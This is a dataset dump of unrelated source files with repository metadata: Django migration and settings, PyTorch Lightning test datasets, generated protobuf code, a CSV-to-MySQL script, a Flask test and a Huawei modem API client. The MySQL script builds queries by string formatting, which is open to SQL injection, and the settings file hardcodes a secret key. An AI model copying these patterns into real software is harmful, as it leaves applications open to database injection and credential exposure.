UTF-8
|
Python
| false
| false
| 478
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('crops', '0002_auto_20150809_0304'),
]
operations = [
migrations.AlterField(
model_name='crop',
name='tier',
field=models.CharField(default=b'1', max_length=255, choices=[(b'1', b'Tier 1'), (b'2', b'Tier 2'), (b'3', b'Tier 3')]),
),
]
|
[
"sam.teahan@aggiemail.usu.edu"
] |
sam.teahan@aggiemail.usu.edu
|
79d2d7e1e1faba7d6c94883f29e01293b580434f
|
00d7824d2699fc7a90de167e04ff49a210458f2c
|
/tests/base/datasets.py
|
fd9e0b5672f766bd4ea76762fd4259aa91bdc98d
|
[
"Apache-2.0",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
jtamir/pytorch-lightning
|
867feab3062ed2e3357b640588220efde349f97b
|
9b89a24b04dff50c0595c5399e9ba61b39745def
|
refs/heads/master
| 2021-07-10T19:40:53.410989
| 2020-11-04T05:59:16
| 2020-11-04T06:00:28
| 213,468,663
| 1
| 0
|
Apache-2.0
| 2019-10-07T19:28:07
| 2019-10-07T19:28:06
| null |
UTF-8
|
Python
| false
| false
| 8,570
|
py
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import random
import time
import urllib.request
from typing import Tuple, Optional, Sequence
import torch
from torch import Tensor
from torch.utils.data import Dataset
from tests import PACKAGE_ROOT
#: local path to test datasets
PATH_DATASETS = os.path.join(PACKAGE_ROOT, 'Datasets')
class MNIST(Dataset):
"""
Customized `MNIST <http://yann.lecun.com/exdb/mnist/>`_ dataset for testing Pytorch Lightning
without the torchvision dependency.
Part of the code was copied from
https://github.com/pytorch/vision/blob/build/v0.5.0/torchvision/datasets/mnist.py
Args:
root: Root directory of dataset where ``MNIST/processed/training.pt``
and ``MNIST/processed/test.pt`` exist.
train: If ``True``, creates dataset from ``training.pt``,
otherwise from ``test.pt``.
normalize: mean and std deviation of the MNIST dataset.
download: If true, downloads the dataset from the internet and
puts it in root directory. If dataset is already downloaded, it is not
downloaded again.
Examples:
>>> dataset = MNIST(download=True)
>>> len(dataset)
60000
>>> torch.bincount(dataset.targets)
tensor([5923, 6742, 5958, 6131, 5842, 5421, 5918, 6265, 5851, 5949])
"""
RESOURCES = (
"https://pl-public-data.s3.amazonaws.com/MNIST/processed/training.pt",
"https://pl-public-data.s3.amazonaws.com/MNIST/processed/test.pt",
)
TRAIN_FILE_NAME = 'training.pt'
TEST_FILE_NAME = 'test.pt'
cache_folder_name = 'complete'
def __init__(self, root: str = PATH_DATASETS, train: bool = True,
normalize: tuple = (0.5, 1.0), download: bool = True):
super().__init__()
self.root = root
self.train = train # training set or test set
self.normalize = normalize
self.prepare_data(download)
if not self._check_exists(self.cached_folder_path):
raise RuntimeError('Dataset not found.')
data_file = self.TRAIN_FILE_NAME if self.train else self.TEST_FILE_NAME
self.data, self.targets = _try_load(os.path.join(self.cached_folder_path, data_file))
def __getitem__(self, idx: int) -> Tuple[Tensor, int]:
img = self.data[idx].float().unsqueeze(0)
target = int(self.targets[idx])
if self.normalize is not None:
img = normalize_tensor(img, mean=self.normalize[0], std=self.normalize[1])
return img, target
def __len__(self) -> int:
return len(self.data)
@property
def cached_folder_path(self) -> str:
return os.path.join(self.root, 'MNIST', self.cache_folder_name)
def _check_exists(self, data_folder: str) -> bool:
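        # The dataset is only considered present if both the training and test files exist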
existing = True
for fname in (self.TRAIN_FILE_NAME, self.TEST_FILE_NAME):
existing = existing and os.path.isfile(os.path.join(data_folder, fname))
return existing
def prepare_data(self, download: bool):
if download:
self._download(self.cached_folder_path)
def _download(self, data_folder: str) -> None:
"""Download the MNIST data if it doesn't exist in cached_folder_path already."""
if self._check_exists(data_folder):
return
os.makedirs(data_folder, exist_ok=True)
for url in self.RESOURCES:
logging.info(f'Downloading {url}')
fpath = os.path.join(data_folder, os.path.basename(url))
urllib.request.urlretrieve(url, fpath)
def _try_load(path_data, trials: int = 30, delta: float = 1.):
    """Resolve loading the same file at the same time from multiple concurrent processes."""
res, exp = None, None
assert trials, "at least some trial has to be set"
assert os.path.isfile(path_data), 'missing file: %s' % path_data
for _ in range(trials):
try:
res = torch.load(path_data)
except Exception as ex:
exp = ex
time.sleep(delta * random.random())
else:
break
else:
# raise the caught exception if any
if exp:
raise exp
return res
def normalize_tensor(tensor: Tensor, mean: float = 0.0, std: float = 1.0) -> Tensor:
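    # Work on a clone so the caller's tensor is untouched, then apply (x - mean) / std in place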
tensor = tensor.clone()
mean = torch.as_tensor(mean, dtype=tensor.dtype, device=tensor.device)
std = torch.as_tensor(std, dtype=tensor.dtype, device=tensor.device)
tensor.sub_(mean).div_(std)
return tensor
class TrialMNIST(MNIST):
    """Constrained image dataset
Args:
root: Root directory of dataset where ``MNIST/processed/training.pt``
and ``MNIST/processed/test.pt`` exist.
train: If ``True``, creates dataset from ``training.pt``,
otherwise from ``test.pt``.
normalize: mean and std deviation of the MNIST dataset.
download: If true, downloads the dataset from the internet and
puts it in root directory. If dataset is already downloaded, it is not
downloaded again.
num_samples: number of examples per selected class/digit
digits: list selected MNIST digits/classes
Examples:
>>> dataset = TrialMNIST(download=True)
>>> len(dataset)
300
>>> sorted(set([d.item() for d in dataset.targets]))
[0, 1, 2]
>>> torch.bincount(dataset.targets)
tensor([100, 100, 100])
"""
def __init__(
self,
root: str = PATH_DATASETS,
train: bool = True,
normalize: tuple = (0.5, 1.0),
download: bool = False,
num_samples: int = 100,
digits: Optional[Sequence] = (0, 1, 2),
):
# number of examples per class
self.num_samples = num_samples
# take just a subset of MNIST dataset
self.digits = digits if digits else list(range(10))
self.cache_folder_name = 'digits-' + '-'.join(str(d) for d in sorted(self.digits)) \
+ f'_nb-{self.num_samples}'
super().__init__(
root,
train=train,
normalize=normalize,
download=download
)
@staticmethod
def _prepare_subset(full_data: torch.Tensor, full_targets: torch.Tensor,
num_samples: int, digits: Sequence):
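        # Collect at most num_samples example indices per requested digit, scanning targets in order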
classes = {d: 0 for d in digits}
indexes = []
for idx, target in enumerate(full_targets):
label = target.item()
if classes.get(label, float('inf')) >= num_samples:
continue
indexes.append(idx)
classes[label] += 1
if all(classes[k] >= num_samples for k in classes):
break
data = full_data[indexes]
targets = full_targets[indexes]
return data, targets
def prepare_data(self, download: bool) -> None:
if self._check_exists(self.cached_folder_path):
return
if download:
self._download(super().cached_folder_path)
for fname in (self.TRAIN_FILE_NAME, self.TEST_FILE_NAME):
path_fname = os.path.join(super().cached_folder_path, fname)
assert os.path.isfile(path_fname), 'Missing cached file: %s' % path_fname
data, targets = _try_load(path_fname)
data, targets = self._prepare_subset(data, targets, self.num_samples, self.digits)
torch.save((data, targets), os.path.join(self.cached_folder_path, fname))
class AverageDataset(Dataset):
def __init__(self, dataset_len=300, sequence_len=100):
self.dataset_len = dataset_len
self.sequence_len = sequence_len
self.input_seq = torch.randn(dataset_len, sequence_len, 10)
top, bottom = self.input_seq.chunk(2, -1)
self.output_seq = top + bottom.roll(shifts=1, dims=-1)
def __len__(self):
return self.dataset_len
def __getitem__(self, item):
return self.input_seq[item], self.output_seq[item]
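# Illustrative usage sketch (not part of the original file): AverageDataset
# pairs a random sequence with a shifted-sum target, which is handy for
# smoke-testing sequence models with a DataLoader.
# from torch.utils.data import DataLoader
# loader = DataLoader(AverageDataset(dataset_len=8, sequence_len=5), batch_size=4)
# x, y = next(iter(loader))
# x.shape, y.shape  # (torch.Size([4, 5, 10]), torch.Size([4, 5, 5]))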
|
[
"noreply@github.com"
] |
jtamir.noreply@github.com
|
58d3cfda83ea5046fc57e7c8de3e95fa26d4f198
|
555b9f764d9bca5232360979460bc35c2f5ad424
|
/google/ads/google_ads/v2/proto/resources/ad_group_audience_view_pb2.py
|
26b4ed14fc842a81e3edeec29f2158892b497c43
|
[
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
juanmacugat/google-ads-python
|
b50256163782bc0223bcd8b29f789d74f4cfad05
|
0fc8a7dbf31d9e8e2a4364df93bec5f6b7edd50a
|
refs/heads/master
| 2021-02-18T17:00:22.067673
| 2020-03-05T16:13:57
| 2020-03-05T16:13:57
| 245,215,877
| 1
| 0
|
Apache-2.0
| 2020-03-05T16:39:34
| 2020-03-05T16:39:33
| null |
UTF-8
|
Python
| false
| true
| 3,716
|
py
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v2/proto/resources/ad_group_audience_view.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v2/proto/resources/ad_group_audience_view.proto',
package='google.ads.googleads.v2.resources',
syntax='proto3',
serialized_options=_b('\n%com.google.ads.googleads.v2.resourcesB\030AdGroupAudienceViewProtoP\001ZJgoogle.golang.org/genproto/googleapis/ads/googleads/v2/resources;resources\242\002\003GAA\252\002!Google.Ads.GoogleAds.V2.Resources\312\002!Google\\Ads\\GoogleAds\\V2\\Resources\352\002%Google::Ads::GoogleAds::V2::Resources'),
serialized_pb=_b('\nDgoogle/ads/googleads_v2/proto/resources/ad_group_audience_view.proto\x12!google.ads.googleads.v2.resources\x1a\x1cgoogle/api/annotations.proto\",\n\x13\x41\x64GroupAudienceView\x12\x15\n\rresource_name\x18\x01 \x01(\tB\x85\x02\n%com.google.ads.googleads.v2.resourcesB\x18\x41\x64GroupAudienceViewProtoP\x01ZJgoogle.golang.org/genproto/googleapis/ads/googleads/v2/resources;resources\xa2\x02\x03GAA\xaa\x02!Google.Ads.GoogleAds.V2.Resources\xca\x02!Google\\Ads\\GoogleAds\\V2\\Resources\xea\x02%Google::Ads::GoogleAds::V2::Resourcesb\x06proto3')
,
dependencies=[google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
_ADGROUPAUDIENCEVIEW = _descriptor.Descriptor(
name='AdGroupAudienceView',
full_name='google.ads.googleads.v2.resources.AdGroupAudienceView',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='resource_name', full_name='google.ads.googleads.v2.resources.AdGroupAudienceView.resource_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=137,
serialized_end=181,
)
DESCRIPTOR.message_types_by_name['AdGroupAudienceView'] = _ADGROUPAUDIENCEVIEW
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
AdGroupAudienceView = _reflection.GeneratedProtocolMessageType('AdGroupAudienceView', (_message.Message,), dict(
DESCRIPTOR = _ADGROUPAUDIENCEVIEW,
__module__ = 'google.ads.googleads_v2.proto.resources.ad_group_audience_view_pb2'
,
__doc__ = """An ad group audience view. Includes performance data from interests and
remarketing lists for Display Network and YouTube Network ads, and
remarketing lists for search ads (RLSA), aggregated at the audience
level.
Attributes:
resource_name:
The resource name of the ad group audience view. Ad group
audience view resource names have the form: ``customers/{cust
omer_id}/adGroupAudienceViews/{ad_group_id}~{criterion_id}``
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.resources.AdGroupAudienceView)
))
_sym_db.RegisterMessage(AdGroupAudienceView)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
[
"noreply@github.com"
] |
juanmacugat.noreply@github.com
|
b8d7a150c280b459d3c7bafaf2ca31069f0f0ff3
|
0830734d5c73de8b25599f653688e57d1859e020
|
/cs387/settings.py
|
1017a8d6c76f27f81d2537649ceaaaa017360eaf
|
[] |
no_license
|
hbhoyar/badluShop
|
6e90afa5017a0baa4026fc5a8e3ddb36802d49a7
|
5735401ae8467bfbaf42df648f55cf1a119aa3e2
|
refs/heads/master
| 2022-04-17T23:46:20.105864
| 2020-02-26T04:59:37
| 2020-02-26T04:59:37
| 238,782,355
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,310
|
py
|
"""
Django settings for cs387 project.
Generated by 'django-admin startproject' using Django 3.0.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*)m*0%&h_!q-@d51_%ycsu6d&cfko)z@05&-6hqlgiot$i-on8'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'cs387.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'cs387.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME' : 'lab3',
'USER' : 'hbhoyar',
'PASSWORD': '',
'HOST': 'localhost',
'PORT': '5432',
},
'sqlite3': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
|
[
"shantanubhoyar02@gmail.com"
] |
shantanubhoyar02@gmail.com
|
56cc543721a5b79b5868f04319f7b73cc77938e1
|
313bb88c43d74995e7426f9482c6c8e670fdb63c
|
/08-exceptions/example3.py
|
1d5bd8590e2c604e419ba991a4bc99737535992e
|
[] |
no_license
|
martakedzior/python-course
|
8e93fcea3e9e1cb51920cb1fcf3ffbb310d1d654
|
3af2296c2092023d91ef5ff3b4ef9ea27ec2f227
|
refs/heads/main
| 2023-05-06T07:26:58.452520
| 2021-05-26T16:50:26
| 2021-05-26T16:50:26
| 339,822,876
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 67
|
py
|
class CustomError(Exception):
pass
raise CustomError('hahaha')
|
[
"marta.kedzior@wp.pl"
] |
marta.kedzior@wp.pl
|
3ed29339d5785d160aa96ad1794ebea9be5a8ceb
|
57c54c0735c496456f03757d4d6ce934707483bf
|
/build/moveit/moveit_planners/ompl/catkin_generated/pkg.installspace.context.pc.py
|
9dc432cf44ba1f6cf8bb517943816fc5f44b28ee
|
[] |
no_license
|
ahmedgamalhasan/catkin_ws
|
a7e0faf4efcaf833afcac4bdff68974542c17ec1
|
d68a25c7a7d81748e4a2c08a82a5acf60310c909
|
refs/heads/main
| 2023-08-20T06:17:53.054329
| 2021-10-16T12:31:01
| 2021-10-16T12:31:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,022
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "${prefix}/include;/opt/ros/noetic/include/ompl-1.5;/usr/include;/usr/include/eigen3".split(';') if "${prefix}/include;/opt/ros/noetic/include/ompl-1.5;/usr/include;/usr/include/eigen3" != "" else []
PROJECT_CATKIN_DEPENDS = "dynamic_reconfigure;moveit_core;roscpp".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lmoveit_ompl_interface;/opt/ros/noetic/lib/x86_64-linux-gnu/libompl.so;/usr/lib/x86_64-linux-gnu/libboost_serialization.so;/usr/lib/x86_64-linux-gnu/libboost_filesystem.so;/usr/lib/x86_64-linux-gnu/libboost_system.so".split(';') if "-lmoveit_ompl_interface;/opt/ros/noetic/lib/x86_64-linux-gnu/libompl.so;/usr/lib/x86_64-linux-gnu/libboost_serialization.so;/usr/lib/x86_64-linux-gnu/libboost_filesystem.so;/usr/lib/x86_64-linux-gnu/libboost_system.so" != "" else []
PROJECT_NAME = "moveit_planners_ompl"
PROJECT_SPACE_DIR = "/home/ahmed2/catkin_ws/install"
PROJECT_VERSION = "1.1.5"
|
[
"ahmedagh2013@live.com"
] |
ahmedagh2013@live.com
|
e5fc5f00fd14a45cd84e931f7688de9dc9f1f1d1
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/115_testing/examples/Github/_Level_2/unittest-master/python/csv_db.py
|
786e3e036143a86b8c363cf013bd10f92db6061b
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395
| 2023-05-29T17:09:11
| 2023-05-29T17:09:11
| 220,583,118
| 3
| 2
| null | 2023-02-16T03:08:10
| 2019-11-09T02:58:47
|
Python
|
UTF-8
|
Python
| false
| false
| 5,718
|
py
|
# finalproject.py
# @author: Shubham Sachdeva
# @email:
# @date: 18-13-09
# reads data from input.csv
# For simplicity reads only ['GEO'], ['DGUID'], ['Food categories'], ['Commodity'] fields
# class Product - a class defining a record
# def read_csv - function that reads data from given file
import csv
import _mysql
import bisect
CONST_AUTHOR = "Shubham Sachdeva"
# Uses mysql database connection.
# Class Database simply wraps basic CRUD operations.
# @author: Shubham Sachdeva
class Database:
# Establishing a mysql connection
def __init__(self):
self.db = _mysql.connect("localhost", "root", "root", "student")
self._tablename = ""
# insert a record
def create(self, product):
query = ("INSERT INTO %s (geo, guid, category, commodity) VALUES('%s', '%s', '%s', '%s')" %
(self._tablename, product.geo, product.guid, product.category, product.commodity))
self.db.query(query)
# update a record based on id
def update(self, id, product):
query = ("UPDATE %s SET geo='%s', guid='%s', category='%s', commodity='%s' WHERE id=%d" %
(self._tablename, product.geo, product.guid, product.category, product.commodity, product.id))
self.db.query(query)
# get a record based on id
def read(self, id):
query = "SELECT * FROM %s WHERE id=%d" % (self._tablename, id)
self.db.query(query)
r = self.db.store_result()
        product = Product('', '', '', '')  # fields are filled in from the fetched row below
for i in r.fetch_row(maxrows=1):
product.id = int(i[0])
product.geo = i[1]
product.guid = i[2]
product.category = i[3]
product.commodity = i[4]
return product
# delete a record based on id
def delete(self, id):
self.db.query("""DELETE FROM %s WHERE id=%d""" % (self._tablename, id))
# create table if it doesn't exist
def select_table(self, tablename):
self.db.query(
"CREATE TABLE IF NOT EXISTS " + tablename + " (`id` INT NOT NULL AUTO_INCREMENT , "
"`geo` VARCHAR(30) NOT NULL , "
"`guid` VARCHAR(30) NOT NULL , "
"`category` VARCHAR(100) NOT NULL , "
"`commodity` VARCHAR(100) NOT NULL , "
"PRIMARY KEY (`id`)) ENGINE = InnoDB;")
self._tablename = tablename
# custom sort function
# sort by guid
# @author: Shubham Sachdeva
def cmpFn(obj):
return obj.guid
# Class List - Custom list using standard list API library.
# Member function find and reverse_find returns index of given element.
# While find returns leftmost position, reverse_find returns rightmost position.
# This assumes that the list is sorted.
# @author: Shubham Sachdeva
class List:
def __init__(self):
self.lst = []
self.lstguid = []
def append(self, obj):
self.lst.append(obj)
def sort(self):
self.lst = sorted(self.lst, key=cmpFn)
self.lstguid = [obj.guid for obj in self.lst ]
def find(self, guid):
return bisect.bisect_left(self.lstguid, guid)
def reverse_find(self, guid):
return bisect.bisect_right(self.lstguid, guid)
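# Illustrative sketch (not part of the original file): after sort(), find() and
# reverse_find() bracket the run of entries sharing a guid, so
# lst.lst[lst.find(g):lst.reverse_find(g)] holds every Product whose guid == g.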
# list iterator
# ListIterator simply operates on a list of primitive types.
# @author: Shubham Sachdeva
class ListIterator:
def __init__(self, lst):
self.lst = lst
self.cur = 0
def get(self):
if self.cur >=0 and self.cur < len(self.lst):
return self.lst[self.cur]
else:
return None
def next(self):
if self.cur < len(self.lst) -1:
self.cur += 1
return True
else:
return False
def prev(self):
if self.cur > 0:
self.cur -= 1
return True
else:
return False
def info(self):
return str(self.get())
# inherited from ListIterator
# Member function info has been overriden.
# @author: Shubham Sachdeva
class ObjectListIterator(ListIterator):
    def info(self):
        obj = self.get()
        if obj is None:
            return "None"
        return "Current Object: " + ("%d\t%s\t%s\t%s\t%s" % (obj.id, obj.geo, obj.guid, obj.category, obj.commodity))
# @author: Shubham Sachdeva
class Product:
# initialisation
def __init__(self, geo, guid, category, commodity):
self.id = 0
self.geo = geo
self.guid = guid
self.category = category
self.commodity = commodity
# for print
def __str__(self):
return ("%d\t%s\t%s\t%s\t%s" % (self.id, self.geo, self.guid, self.category, self.commodity))
# reads 4 fields from given file
# @author: Shubham Sachdeva
def read_csv(file_name):
lst = []
try:
with open(file_name, newline='', encoding='utf-8') as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
product = Product(row['GEO'], row['DGUID'], row['Food categories'], row['Commodity'])
print (product)
lst.append(product)
    except Exception as e:
        print ('read_csv failed:', e)
return lst
# @author: Shubham Sachdeva
def main():
lst = read_csv('input.csv')
n = len(lst)
db = Database()
db.select_table('products')
for item in lst:
db.create(item)
print ("Created " + str(len(lst)) + " items");
print("Programmed by " + CONST_AUTHOR)
if __name__ == '__main__':
print (CONST_AUTHOR)
main()
|
[
"sergejyurskyj@yahoo.com"
] |
sergejyurskyj@yahoo.com
|
debf360fa987a6e58b701bbad0d9e2b2366bcb22
|
6b28dab8b7a9db261f3cb78dce83bee9ea6e4228
|
/graziela/Modulo3/Aula4/Exemplo5.py
|
11e9d4c4346bb78c941ae51bb8090aaae6078f8c
|
[] |
no_license
|
grazielags/cp12
|
359bc95cdb478b7b5bd1b347593df15e60060338
|
2ed2f5164d9f3acae6b6e8fccadf5609fb1da7eb
|
refs/heads/master
| 2020-06-14T06:48:42.842554
| 2019-10-09T02:09:13
| 2019-10-09T02:09:13
| 194,937,381
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 260
|
py
|
# initialize the grades list with 0
notas = [0] * 3
soma = 0
# fill the grades list, without using append
for i in range(3):
    notas[i] = float(input("Enter the grade for student " + str(i) + ": "))
    soma = soma + notas[i]
print("The class average is: ", soma/3)
|
[
"graziela@gmail.com"
] |
graziela@gmail.com
|
7059490dec787f11a2313b25aa4c4e3700fe331d
|
a8d693031e9ea97e19cb2727c15bdea83eb27fa8
|
/tests/test_basics.py
|
4a1255a3053392e3277a694d2e4751b3922d91a4
|
[] |
no_license
|
hoffrenm/lukuvinkkikirjasto
|
f5d8047c223efe7f95a9acbdfdb6f5b1151eccee
|
94623dd557d278abc033c29f108eb84fcda171d8
|
refs/heads/master
| 2022-12-15T20:20:30.718292
| 2020-05-06T11:48:26
| 2020-05-06T11:48:26
| 252,186,207
| 0
| 0
| null | 2022-12-08T03:58:13
| 2020-04-01T13:41:11
|
Python
|
UTF-8
|
Python
| false
| false
| 610
|
py
|
import unittest
from flask import current_app
from application import create_app, db
class BasicsTestCase(unittest.TestCase):
def setUp(self):
self.app = create_app('testing')
self.app_context = self.app.app_context()
self.app_context.push()
with self.app.app_context():
db.create_all()
def tearDown(self):
db.session.remove()
db.drop_all()
self.app_context.pop()
def test_app_exists(self):
self.assertFalse(current_app is None)
def test_app_is_testing(self):
self.assertTrue(current_app.config['TESTING'])
|
[
"ijmakine@gmail.com"
] |
ijmakine@gmail.com
|
c6c0632c3c5c78c8fbed26e8ad96a6bc3aead190
|
e4b5c93b3efcc084a0fdd3a66288b089d5ebe6c6
|
/huawei_interface.py
|
bfb8715d9362667091681e6f0f4626bd07b21c41
|
[
"MIT"
] |
permissive
|
frillip/field-control-panel
|
d3cbaba974aee74dd1cedacd54a4c30c8cd42bc5
|
57bff153750a7f80c68985786d2c2a15ce2030db
|
refs/heads/master
| 2022-05-27T05:52:10.304126
| 2022-05-11T21:37:01
| 2022-05-11T21:37:01
| 211,827,798
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,682
|
py
|
import requests
import xmltodict
from time import sleep
import global_vars
from yaml_config import config
import logging
import colorlog
logger = colorlog.getLogger(__name__)
logger.addHandler(global_vars.file_handler)
logger.addHandler(global_vars.handler)
logger.setLevel(global_vars.log_level)
def get_auth_data():
token_info_api_url="http://" + config['huawei']['dongle_ip'] + "/api/webserver/SesTokInfo"
try:
token_resp = requests.get(token_info_api_url)
if "SessionID" in token_resp.text:
token=xmltodict.parse(token_resp.content)['response']
token_secret=token["TokInfo"]
session_id=token["SesInfo"]
auth_data = { "session_id": session_id, "token_secret": token_secret }
return auth_data
else:
logger.error("Modem auth data request failed: " + token_resp.text)
return False
except Exception as e:
logger.error("Modem auth data request failed: " + str(e))
def construct_auth_headers(auth_data):
headers = {"Content-Type": "text/xml; charset=UTF-8",
"Cookie": auth_data['session_id'],
"__RequestVerificationToken": auth_data['token_secret']}
return headers
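# Sketch of the handshake the two helpers above implement (values hypothetical):
# auth_data = get_auth_data()                # {"session_id": "SessionID=...", "token_secret": "..."}
# headers = construct_auth_headers(auth_data)
# requests.get(status_url, headers=headers)  # any authenticated HiLink API call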
def send_connection_req():
req_connection_api_url="http://" + config['huawei']['dongle_ip'] + "/api/dialup/dial"
connection_req_xml = '<?xml version="1.0" encoding="UTF-8"?><request><Action>1</Action></request>'
try:
logger.warning("Sending connection request to modem")
auth_data=get_auth_data()
if auth_data:
headers = construct_auth_headers(auth_data)
post_req = requests.post(req_connection_api_url, headers=headers, data=connection_req_xml)
if "OK" in post_req.text:
logger.warning("Connection request made OK!")
return True
else:
logger.error("Modem connection request failed: " + post_req.text)
return False
except Exception as e:
logger.error("Modem connection request failed: " + str(e))
def send_reboot_req():
req_reboot_api_url="http://" + config['huawei']['dongle_ip'] + "/api/device/control"
reboot_req_xml = '<?xml version="1.0" encoding="UTF-8"?><request><Control>1</Control></request>'
try:
logger.warning("Sending reboot request to modem")
auth_data=get_auth_data()
if auth_data:
headers = construct_auth_headers(auth_data)
post_req = requests.post(req_reboot_api_url, headers=headers, data=reboot_req_xml)
if "OK" in post_req.text:
logger.warning("Modem rebooting!")
return True
else:
logger.error("Modem reboot request failed: " + post_req.text)
return False
except Exception as e:
logger.error("Modem reboot request failed: " + str(e))
def send_reset_stats():
req_clear_traffic_api_url="http://" + config['huawei']['dongle_ip'] + "/api/monitoring/clear-traffic"
clear_traffic_req_xml = '<?xml version="1.0" encoding="UTF-8"?><request><ClearTraffic>1</ClearTraffic></request>'
try:
logger.warning("Sending traffic statis reset request to modem")
auth_data=get_auth_data()
if auth_data:
headers = construct_auth_headers(auth_data)
post_req = requests.post(req_clear_traffic_api_url, headers=headers, data=clear_traffic_req_xml)
if "OK" in post_req.text:
logger.warning("Traffic stats cleared!")
return True
else:
logger.error("Traffic stats reset request failed: " + post_req.text)
return False
except Exception as e:
logger.error("Traffic stats reset request failed: " + str(e))
def get_modem_data():
get_dev_info_api_url="http://" + config['huawei']['dongle_ip'] + "/api/device/information"
get_net_name_api_url="http://" + config['huawei']['dongle_ip'] + "/api/net/current-plmn"
get_mon_stat_api_url="http://" + config['huawei']['dongle_ip'] + "/api/monitoring/status"
get_mon_traf_api_url="http://" + config['huawei']['dongle_ip'] + "/api/monitoring/traffic-statistics"
get_mon_data_plan_api_url="http://" + config['huawei']['dongle_ip'] + "/api/monitoring/start_date"
get_mon_data_stats_api_url="http://" + config['huawei']['dongle_ip'] + "/api/monitoring/month_statistics"
try:
auth_data=get_auth_data()
if auth_data:
headers = construct_auth_headers(auth_data)
dev_info_resp = requests.get(get_dev_info_api_url, headers=headers)
if "DeviceName" in dev_info_resp.text:
dev_info = xmltodict.parse(dev_info_resp.content)['response']
global_vars.modem_data["device_name"] = dev_info["DeviceName"]
else:
